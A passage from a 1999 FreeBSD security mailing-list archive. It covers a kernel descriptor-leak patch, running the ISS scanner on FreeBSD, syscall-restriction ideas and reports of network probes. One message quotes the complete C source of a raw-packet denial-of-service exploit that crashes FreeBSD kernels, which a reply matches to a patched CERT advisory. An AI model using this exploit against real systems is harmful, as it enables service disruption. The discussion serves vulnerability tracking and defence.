IIRC. ] On my 3.1-RELEASE system it reports numerous sendmsg ECONNREFUSED and ] ENOENTs, then eventually dives into repeats of: ] ] unlink error 2 ] bind error 9 ] sento error 9 ] recvmsg error 9 ] socket error 23 Steinar Haug noticed something odd in the exploit code - the client process doesn't block in recvmsg() like one would expect. If a message is waiting, the client process will receive it, but if not, the client will fall through the recvmsg() without getting an error indication. This means that the client and server don't run in lockstep. With the default UFS mount options for /tmp, the client process will block for short periods of time while it executes bind() and unlink(). If /tmp is MFS or is mounted async or with softupdates, the client process will probably only block when its scheduling quantum expires. This oddity may allow multiple requests to accumulate for the server process, and allows the server process to attempt to send responses at possibly inconvenient times for the client. If the server calls sendmsg() between the client's bind() and recvmsg() syscalls, then everything works normally. If the server calls sendmsg() between the client's recvmsg() and close(sockfd) syscalls, or if the server manages to do more than one sendmsg() call during one iteration of the client, which might happen if the client exhausts its scheduling time quantum, one or more messages will be outstanding when the client executes close(sockfd). This will result in unp_gc() being called to garbage collect the descriptors that are in flight. In FreeBSD < 3.1-RELEASE, this will result in a panic due to sorflush() being improperly called on a non-socket descriptor. If the server calls sendmsg() after the client's close(sockfd) and before the client unlinks the socket, the sendmsg() call will fail with ECONNREFUSED. If the server calls sendmsg() after the client unlinks the socket and before the client calls bind(), then the sendmsg() will fail with ENOENT. Either of these failures will cause the descriptor being sent to be permanently leaked away. The rate at which descriptors are leaked depends on how the client and server processes are scheduled. Once enough descriptors have been leaked away, the client's socket() syscall will fail with ENFILE, the bind(), sendto(), and recvmsg() syscalls will fail with EBADF because the socket was not created, and unlink() will fail because the socket name was not created by bind(). The following patch appears to fix the descriptor leak. I hope to commit it later today. Index: uipc_usrreq.c =================================================================== RCS file: /home/ncvs/src/sys/kern/uipc_usrreq.c,v retrieving revision 1.43 diff -u -u -r1.43 uipc_usrreq.c --- uipc_usrreq.c 1999/04/28 11:37:07 1.43 +++ uipc_usrreq.c 1999/05/09 23:50:45 @@ -367,6 +367,9 @@ unp_shutdown(unp); } + if (control && error != 0) + unp_dispose(control); + release: if (control) m_freem(control); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 10 17:54:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from loki.iss.net (loki.iss.net [208.21.0.3]) by hub.freebsd.org (Postfix) with ESMTP id E738C15537 for ; Mon, 10 May 1999 17:54:19 -0700 (PDT) (envelope-from rmooney@iss.net) Received: from arden.iss.net (IDENT:rmooney@arden.iss.net [208.21.0.8]) by loki.iss.net (8.9.3/8.9.3) with SMTP id UAA28991 for ; Mon, 10 May 1999 20:52:46 -0400 Date: Mon, 10 May 1999 20:54:21 -0400 (EDT) From: Robert Mooney To: security@freebsd.org Subject: ISS on FreeBSD (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is not an attempt at spam. I'm on this list, and use FreeBSD at home and in the office. This is also not endorsed by ISS. I doubt they will take any responsibility for the product when modified as suggested below. Flames can be directed to /dev/null. ---------- Forwarded message ---------- Date: Mon, 10 May 1999 20:22:48 -0400 (EDT) From: Hoss Firooznia To: support@iss.net Subject: ISS on FreeBSD Hello ISS support folks, I work as a System Administrator at the University of Rochester and I'm currently evaluating your Intranet Security Scanner product for use on FreeBSD systems. I realize that you don't directly support FreeBSD, but I can confirm that it is possible to run the Linux version of ISS on FreeBSD versions 3.1 and up. I wanted to let you know what steps were necessary to get the scanner working properly in case this information is of use to you or your customers. Thanks, - Hoss -- Hoss Firooznia, UNIX SA, Department of Mathematics, University of Rochester PGP public key: ----- To run ISS (Linux version 5.3.1) under FreeBSD 3.x... 1) Make sure you have Linux support enabled in /etc/rc.conf, and make sure your kernel has SYSVSEM, SYSVSHM and SYSVMSG support compiled in (see /usr/src/sys/i386/conf/LINT for details). 2) Untar the distribution and apply this patch in the top-level directory: --- install.iss.orig Mon May 10 18:50:43 1999 +++ install.iss Mon May 10 18:52:16 1999 @@ -150,6 +150,12 @@ NLSPATH=$NLSPATH:/usr/lib/nls/ KEYSYMDB=$KEYSYMDB:/usr/lib/X11/XKeysymDB ;; + FreeBSD) + OS=Linux + UNCOMPRESS=gunzip + NLSPATH=$NLSPATH:/usr/X11R6/lib/X11/nls/ + KEYSYMDB=$KEYSYMDB:/usr/X11R6/lib/X11/XKeysymDB + ;; Linux) OS=Linux UNCOMPRESS=gunzip 3) Run 'install.iss' as per the documentation. 4) Run 'brandelf -t Linux bin/{iss,xiss,issreport,mail-module}' from the top-level directory. 5) Make a symlink from /usr/local/bin/netscape to wherever netscape lives on your system. Scan away! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 10 19:43:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from atlas.cc.uregina.ca (ATLAS.CC.UREGINA.CA [142.3.100.254]) by hub.freebsd.org (Postfix) with ESMTP id 89AB914BD5 for ; Mon, 10 May 1999 19:43:31 -0700 (PDT) (envelope-from galbraik@uregina.ca) Received: from hyperion.cc.uregina.ca (HYPERION.CC.UREGINA.CA [142.3.100.33]) by atlas.cc.uregina.ca (8.9.1/8.9.1) with ESMTP id UAA00263 for ; Mon, 10 May 1999 20:43:30 -0600 (CST) Received: from uregina.ca ([142.3.217.83]) by hyperion.cc.uregina.ca (8.9.1/8.9.1) with ESMTP id UAA15146 for ; Mon, 10 May 1999 20:43:21 -0600 (CST) Message-ID: <37379BB3.DE430DFA@uregina.ca> Date: Mon, 10 May 1999 20:53:39 -0600 From: Kristopher Galbraith Organization: University of Regina X-Mailer: Mozilla 4.51 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: [Fwd: ISS on FreeBSD (fwd)] Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I would like to say "Thank you" for posting this. I am familiar with ISS and the fact that you can use it on FreeBSD is very applicable to this newsgroup and useful to myself. My question is this for the sensor boxes only or for the sensors and the main computer as well? Robert Mooney wrote: > This is not an attempt at spam. I'm on this list, and use FreeBSD at home > and in the office. This is also not endorsed by ISS. I doubt they will > take any responsibility for the product when modified as suggested below. > > Flames can be directed to /dev/null. > > ---------- Forwarded message ---------- > Date: Mon, 10 May 1999 20:22:48 -0400 (EDT) > From: Hoss Firooznia > To: support@iss.net > Subject: ISS on FreeBSD > > Hello ISS support folks, > > I work as a System Administrator at the University of Rochester and I'm > currently evaluating your Intranet Security Scanner product for use on > FreeBSD systems. I realize that you don't directly support FreeBSD, but I > can confirm that it is possible to run the Linux version of ISS on FreeBSD > versions 3.1 and up. I wanted to let you know what steps were necessary to > get the scanner working properly in case this information is of use to you > or your customers. > > Thanks, > - Hoss > -- > Hoss Firooznia, UNIX SA, Department of Mathematics, University of Rochester > PGP public key: > > ----- > > To run ISS (Linux version 5.3.1) under FreeBSD 3.x... > > 1) Make sure you have Linux support enabled in /etc/rc.conf, and make sure > your kernel has SYSVSEM, SYSVSHM and SYSVMSG support compiled in > (see /usr/src/sys/i386/conf/LINT for details). > > 2) Untar the distribution and apply this patch in the top-level directory: > > --- install.iss.orig Mon May 10 18:50:43 1999 > +++ install.iss Mon May 10 18:52:16 1999 > @@ -150,6 +150,12 @@ > NLSPATH=$NLSPATH:/usr/lib/nls/ > KEYSYMDB=$KEYSYMDB:/usr/lib/X11/XKeysymDB > ;; > + FreeBSD) > + OS=Linux > + UNCOMPRESS=gunzip > + NLSPATH=$NLSPATH:/usr/X11R6/lib/X11/nls/ > + KEYSYMDB=$KEYSYMDB:/usr/X11R6/lib/X11/XKeysymDB > + ;; > Linux) > OS=Linux > UNCOMPRESS=gunzip > > 3) Run 'install.iss' as per the documentation. > > 4) Run 'brandelf -t Linux bin/{iss,xiss,issreport,mail-module}' from the > top-level directory. > > 5) Make a symlink from /usr/local/bin/netscape to wherever netscape lives > on your system. Scan away! > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Kristopher Galbraith Technician, Computing Services, University of Regina To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 10 20:19: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 967A51591E for ; Mon, 10 May 1999 20:18:56 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id UAA03617; Mon, 10 May 1999 20:18:07 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id UAA26154; Mon, 10 May 1999 20:18:05 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id UAA26058; Mon, 10 May 1999 20:18:04 -0700 (PDT) From: Don Lewis Message-Id: <199905110318.UAA26058@salsa.gv.tsc.tdk.com> Date: Mon, 10 May 1999 20:18:03 -0700 In-Reply-To: Darren Reed "freebsd mbuf crash" (May 5, 1:26am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Darren Reed , freebsd-security@FreeBSD.ORG Subject: Re: freebsd mbuf crash Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I now suspect this is an exploit for the bug mentioned in CERT Advisory CA-98-13-tcp-denial-of-service. If so this bug was fixed for FreeBSD 3.0-CURRENT in revision 1.105 of ip_input.c, and revision 1.50.2.22 before 2.2.8-RELEASE. Both fixes were committed on November 11, 1998. This exploit's use of a large number of options in the IP header seems to be the tipoff. On May 5, 1:26am, Darren Reed wrote: } Subject: freebsd mbuf crash } } is this one (below) taken care of ? perhaps a derivitice of this ? } } darren } } /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998. } * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine. } */ } } #include } #include } #include } #define __FAVOR_BSD } #include } #include } #include } #include } #include } #include } } } u_long htona(char *host) } { } u_long addr; } struct hostent *hp; } } if ((addr=inet_addr(host)) == INADDR_NONE) { } if ((hp = gethostbyname(host)) == NULL) } return(-1); } bcopy(hp->h_addr_list[0], &addr, sizeof(addr)); } } } return(addr); } } } } int main(int argc, char* argv[]) } { } char buf[128]; } struct ip *iph = (struct ip *)buf; } u_char *ipoptions = (u_char *)(buf + sizeof(struct ip)); } struct tcphdr *tcph = (struct tcphdr *)(buf + 60); } int s, i; } struct sockaddr_in sin; } } if (argc != 2) { } printf("usage\n\t%s \n", argv[0]); } exit(1); } } } s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); } if (s < 0) { } perror("socket"); } exit(1); } } } sin.sin_family = AF_INET; } sin.sin_port = htons(7); } sin.sin_addr.s_addr = htona(argv[1]); } if (sin.sin_addr.s_addr == -1) { } printf("Error resolving %s\n", argv[1]); } exit(1); } } } } bzero(buf, sizeof(buf)); } iph->ip_hl=15; } iph->ip_v=4; } iph->ip_len=htons(124); } iph->ip_id= htons(getpid()); } iph->ip_off= htons(IP_MF); } iph->ip_ttl = 255; } iph->ip_p = IPPROTO_TCP; } bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long)); } iph->ip_src.s_addr = htona("10.2.3.4"); } for (i = 0; i < 20;i++) { } ipoptions[i]=0xff; } } } ipoptions[0] = 0xff; /* Made up option */ } ipoptions[1] = 0x1a; } memset((char *)&ipoptions[2], 0xff, 37); } ipoptions[39] = 1; /* IP_NOP */ } tcph->th_sport = htons(5505); } tcph->th_dport = htons(23); } tcph->th_seq = htonl(0xabcde123); } tcph->th_ack = htonl(0x321edcba); } tcph->th_flags = TH_ACK | TH_PUSH; } tcph->th_win = htons(0x1234); } } if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) { } perror("sendto"); } exit(1); } } } if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) { } perror("sendto"); } exit(1); } } } iph->ip_len = htons(80); } iph->ip_off = htons(8); } if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) { } perror("sendto"); } exit(1); } } } exit(0); } } } } } } To Unsubscribe: send mail to majordomo@FreeBSD.org } with "unsubscribe freebsd-security" in the body of the message }-- End of excerpt from Darren Reed To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 12:57: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 8C62A15DF2 for ; Tue, 11 May 1999 12:56:42 -0700 (PDT) (envelope-from shadows@whitefang.com) Received: (qmail 5732 invoked from network); 11 May 1999 19:56:39 -0000 Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 11 May 1999 19:56:39 -0000 Date: Tue, 11 May 1999 12:55:40 -0700 (PDT) From: Thamer Al-Herbish To: freebsd-security@FreeBSD.ORG Subject: Wrapping syscalls Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've recently had the idea of wrapping system calls with a capability check per process. The end objective is to have a patch for FreeBSD that adds a system call which can be used to drop the capability of calling a certain system call. The simplest example would be a web server that after chroot()ing would call lsyscall(EXECVE) and drop its ability to execve(). It may also drop its write() ability and so on. Leaving only a few read-only system calls that would effectively make it read-only. Has anyone attempted something similar? Is there an inherent effeciency problem with just adding checks to the beginning of every system call? I'm aware of some security issues that are _not_ solved by this: specificially dropping write() capabilities but still being able to truncate files with the open() call. Additionally, the child process will inheret its parent's disposition and never be able to reclaim a system call. -- Thamer Al-Herbish PGP public key: shadows@whitefang.com http://www.whitefang.com/pgpkey.txt [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 14:21:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 8E35614BF6 for ; Tue, 11 May 1999 14:21:29 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id RAA08799; Tue, 11 May 1999 17:21:10 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Tue, 11 May 1999 17:21:10 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Thamer Al-Herbish Cc: freebsd-security@FreeBSD.ORG Subject: Re: Wrapping syscalls In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Search for wrappers in the mailin list archive -- TIS released a fairly comprehensive package that does pretty much what you describe. My own tokens kernel module does something fairly similar, hooking additional security semantics onto a process, and providing additional capabilities based on the tokens acquired and exchanged. That code is fairly experimental, however, and I'm not sure I ever put the latest code online. I'm currently making use of the exchangable syscall array mechanism to create speculative copies of processes to generate disk prefetches, in a differnet project. On Tue, 11 May 1999, Thamer Al-Herbish wrote: > I've recently had the idea of wrapping system calls with a > capability check per process. The end objective is to have a patch > for FreeBSD that adds a system call which can be used to drop the > capability of calling a certain system call. > > The simplest example would be a web server that after chroot()ing > would call lsyscall(EXECVE) and drop its ability to execve(). It may > also drop its write() ability and so on. Leaving only a few > read-only system calls that would effectively make it read-only. > > Has anyone attempted something similar? Is there an inherent > effeciency problem with just adding checks to the beginning of every > system call? I'm aware of some security issues that are _not_ solved > by this: specificially dropping write() capabilities but still being > able to truncate files with the open() call. > > Additionally, the child process will inheret its parent's > disposition and never be able to reclaim a system call. > > -- > Thamer Al-Herbish PGP public key: > shadows@whitefang.com http://www.whitefang.com/pgpkey.txt > [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 14:24:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id F303614F6E for ; Tue, 11 May 1999 14:23:12 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id HAA00753; Wed, 12 May 1999 07:23:01 +1000 (EST) From: Darren Reed Message-Id: <199905112123.HAA00753@cheops.anu.edu.au> Subject: Re: Wrapping syscalls To: shadows@whitefang.com (Thamer Al-Herbish) Date: Wed, 12 May 1999 07:23:00 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Thamer Al-Herbish" at May 11, 99 12:55:40 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Thamer Al-Herbish, sie said: > > I've recently had the idea of wrapping system calls with a > capability check per process. The end objective is to have a patch > for FreeBSD that adds a system call which can be used to drop the > capability of calling a certain system call. > > The simplest example would be a web server that after chroot()ing > would call lsyscall(EXECVE) and drop its ability to execve(). It may > also drop its write() ability and so on. Leaving only a few > read-only system calls that would effectively make it read-only. Logging would be interesting, as would write'ing data to be sent back to the client :-) Lets hope they're not interested in using CGI either :-) > Has anyone attempted something similar? Is there an inherent > effeciency problem with just adding checks to the beginning of every > system call? I'm aware of some security issues that are _not_ solved > by this: specificially dropping write() capabilities but still being > able to truncate files with the open() call. The Solaris implementation of ptrace or /proc allows for a monitor process to run and actully provide returns values in place of the kernel for system calls (this was described at a Usenix Security Symposium). > Additionally, the child process will inheret its parent's > disposition and never be able to reclaim a system call. This isn't a capability based solution in the traditional sense of that term, more of a means being able to deny yourself use of certain system calls. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 14:30: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 4137714BE1 for ; Tue, 11 May 1999 14:30:03 -0700 (PDT) (envelope-from shadows@whitefang.com) Received: (qmail 5976 invoked from network); 11 May 1999 21:30:01 -0000 Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 11 May 1999 21:30:01 -0000 Date: Tue, 11 May 1999 14:29:02 -0700 (PDT) From: Thamer Al-Herbish To: Darren Reed Cc: freebsd-security@FreeBSD.ORG Subject: Re: Wrapping syscalls In-Reply-To: <199905112123.HAA00753@cheops.anu.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 12 May 1999, Darren Reed wrote: > Logging would be interesting, as would write'ing data to be sent > back to the client :-) Lets hope they're not interested in using > CGI either :-) You would need some granulity I suppose. Just looked at the TIS post, it's been done and done well it seems. > This isn't a capability based solution in the traditional sense of > that term, more of a means being able to deny yourself use of certain > system calls. Absolutely not. -- Thamer Al-Herbish PGP public key: shadows@whitefang.com http://www.whitefang.com/pgpkey.txt [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 15:35:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from lazlo.internal.steam.com (lazlo.steam.com [199.108.84.37]) by hub.freebsd.org (Postfix) with ESMTP id 94FAA15026 for ; Tue, 11 May 1999 15:35:51 -0700 (PDT) (envelope-from cliff@steam.com) Received: from lazlo.internal.steam.com (cliff@lazlo.internal.steam.com [192.168.32.2]) by lazlo.internal.steam.com (8.9.3/8.9.3) with ESMTP id PAA02581; Tue, 11 May 1999 15:35:42 -0700 (PDT) Date: Tue, 11 May 1999 15:35:42 -0700 (PDT) From: Cliff Skolnick X-Sender: cliff@lazlo.internal.steam.com To: Thamer Al-Herbish Cc: freebsd-security@FreeBSD.ORG Subject: Re: Wrapping syscalls In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Two problems that I see of the top of my head. 1) Logging, if you disable loging you will be sad. Loging usually requires a "write" system call. I supposed you could log over a socket with send() and friends, but this may require many application changes. 2) mmap(), and perhaps more like it, define the read/write behavior as a parameter to the system call. A simply allow/disallow will not be a high enough granularity in many cases. Would it be possible to have a generic parameter mask associated with the system call? It would solve both the above issues by having a system open the log file for write, then mask off the write flag in any following open() syscalls. You could also just mask off the write ability in mmap(). A system call filter, looks like a user/kernel firewall. :) Cliff On Tue, 11 May 1999, Thamer Al-Herbish wrote: > I've recently had the idea of wrapping system calls with a > capability check per process. The end objective is to have a patch > for FreeBSD that adds a system call which can be used to drop the > capability of calling a certain system call. > > The simplest example would be a web server that after chroot()ing > would call lsyscall(EXECVE) and drop its ability to execve(). It may > also drop its write() ability and so on. Leaving only a few > read-only system calls that would effectively make it read-only. > > Has anyone attempted something similar? Is there an inherent > effeciency problem with just adding checks to the beginning of every > system call? I'm aware of some security issues that are _not_ solved > by this: specificially dropping write() capabilities but still being > able to truncate files with the open() call. > > Additionally, the child process will inheret its parent's > disposition and never be able to reclaim a system call. > > -- > Thamer Al-Herbish PGP public key: > shadows@whitefang.com http://www.whitefang.com/pgpkey.txt > [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Cliff Skolnick | "They that can give up essential liberty to obtain Steam Tunnel Operations | a little temporary safety deserve neither liberty cliff@steam.com | nor safety." http://www.steam.com/ | -- Benjamin Franklin, 1759 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 15:57:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from Homer.Web-Ex.com (homer.web-ex.com [209.54.66.254]) by hub.freebsd.org (Postfix) with ESMTP id C212D1514F for ; Tue, 11 May 1999 15:57:35 -0700 (PDT) (envelope-from jim@web-ex.com) Received: from localhost (jim@localhost) by Homer.Web-Ex.com (8.9.3/8.9.3) with ESMTP id SAA64508 for ; Tue, 11 May 1999 18:57:38 -0400 (EDT) X-Authentication-Warning: Homer.Web-Ex.com: jim owned process doing -bs Date: Tue, 11 May 1999 18:57:38 -0400 (EDT) From: Jim Cassata To: freebsd-security@freebsd.org Subject: new type of attack? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org i just received this.... > We have been tracking a long series of subtle network probes that >use TCP packets constructed with ACK and RST bits set. This bit >combination allows these packets to pass through common packet filters. >The attackers have breached many systems around the net, focusing on >Linux and FreeBSD systems. These breached systems are used to either >receive directly or through packet sniffing the responses from forged >packets sent by the attackers. On Sunday (5-9-99), we collected some >probe packets from address 209.54.43.133. This host is called >sex.fiend.cx and appears to be part of your network. There is a strong >possiblity that this host or one very near it has been breached and is >being used to collect data probed from other networks. Our logs go back >over a month and this is the first time this particular host has been >seen on our network. The attackers seem to be able to move on to new >systems very quickly as there are apparently plenty of vulnerable >systems to breach. Our mail server was breached back in December and >was used for similar activities for 2 days. The attackers created 2 >accounts, udp and reboot. The udp account had root privs and no >password. > >The time of the probe was 14:05 CDT has anyone seen this kind of thing? Jim Cassata 516.421.6000 jim@web-ex.com Web Express 20 Broadhollow Road Suite 3011 Melville, NY 11747 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 16: 9: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from vidnt2.hq.vid-h2o.org (vista2-blk1-hfc-0251-d1db0de8.rdc1.sdca.coxatwork.com [209.219.13.232]) by hub.freebsd.org (Postfix) with ESMTP id 8573815234 for ; Tue, 11 May 1999 16:09:01 -0700 (PDT) (envelope-from JDoscher@vid-h2o.org) Received: by VIDNT2 with Internet Mail Service (5.5.2232.9) id ; Tue, 11 May 1999 16:11:55 -0700 Message-ID: From: Jay Doscher To: 'Jim Cassata' Cc: "'freebsd-security@FreeBSD.ORG'" Subject: RE: new type of attack? Date: Tue, 11 May 1999 16:10:59 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2232.9) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I experienced this kind of attack on a Redhat Linux 5.1 machine that had not been patched. My experience was that the attacker was using a set of tools such as cracker.pl and queso ( a port redirector) in a script that scanned a subnet for slackware or redhat machines that were unpatched against the mountd exploit. The scripts run and when they find a machine whose IP stack matches one of these OS'es it attempts to run the mountd exploit, after it does it proceeds to root the machine and run cracker.pl against all the other accounts. I recieved several complaints of scans and probes from this box against other sysadmins. I traced the IP back to an ISP whom when notified found one of his routers had been compromised and was propagating a spoofed IP (or running nat, i dunno) without his knowledge. The script seems to exploit a machine, then use that machine as a springboard to launch further attacks. I know this isn't a BSD issue, but I think it would explain the probes. Jay -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Jim Cassata Sent: Tuesday, May 11, 1999 3:58 PM To: freebsd-security@FreeBSD.ORG Subject: new type of attack? i just received this.... > We have been tracking a long series of subtle network probes that >use TCP packets constructed with ACK and RST bits set. This bit >combination allows these packets to pass through common packet filters. >The attackers have breached many systems around the net, focusing on >Linux and FreeBSD systems. These breached systems are used to either >receive directly or through packet sniffing the responses from forged >packets sent by the attackers. On Sunday (5-9-99), we collected some >probe packets from address 209.54.43.133. This host is called >sex.fiend.cx and appears to be part of your network. There is a strong >possiblity that this host or one very near it has been breached and is >being used to collect data probed from other networks. Our logs go back >over a month and this is the first time this particular host has been >seen on our network. The attackers seem to be able to move on to new >systems very quickly as there are apparently plenty of vulnerable >systems to breach. Our mail server was breached back in December and >was used for similar activities for 2 days. The attackers created 2 >accounts, udp and reboot. The udp account had root privs and no >password. > >The time of the probe was 14:05 CDT has anyone seen this kind of thing? Jim Cassata 516.421.6000 jim@web-ex.com Web Express 20 Broadhollow Road Suite 3011 Melville, NY 11747 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 17:35:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id DBCB114E04 for ; Tue, 11 May 1999 17:35:09 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id RAA80884; Tue, 11 May 1999 17:35:02 -0700 (PDT) (envelope-from dillon) Date: Tue, 11 May 1999 17:35:02 -0700 (PDT) From: Matthew Dillon Message-Id: <199905120035.RAA80884@apollo.backplane.com> To: Jim Cassata Cc: freebsd-security@FreeBSD.ORG Subject: Re: new type of attack? References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :i just received this.... : :> We have been tracking a long series of subtle network probes that :>use TCP packets constructed with ACK and RST bits set. This bit :>combination allows these packets to pass through common packet filters. :>The attackers have breached many systems around the net, focusing on :>Linux and FreeBSD systems. These breached systems are used to either :>receive directly or through packet sniffing the responses from forged :>packets sent by the attackers. On Sunday (5-9-99), we collected some :>probe packets from address 209.54.43.133. This host is called :>sex.fiend.cx and appears to be part of your network. There is a strong :>possiblity that this host or one very near it has been breached and is :>being used to collect data probed from other networks. Our logs go back :>over a month and this is the first time this particular host has been :>seen on our network. The attackers seem to be able to move on to new :>systems very quickly as there are apparently plenty of vulnerable :>systems to breach. Our mail server was breached back in December and :>was used for similar activities for 2 days. The attackers created 2 :>accounts, udp and reboot. The udp account had root privs and no :>password. :> :>The time of the probe was 14:05 CDT : :has anyone seen this kind of thing? : :Jim Cassata : :516.421.6000 :jim@web-ex.com : :Web Express :20 Broadhollow Road :Suite 3011 :Melville, NY 11747 The network probe idea sounds interesting. The breech in this person's 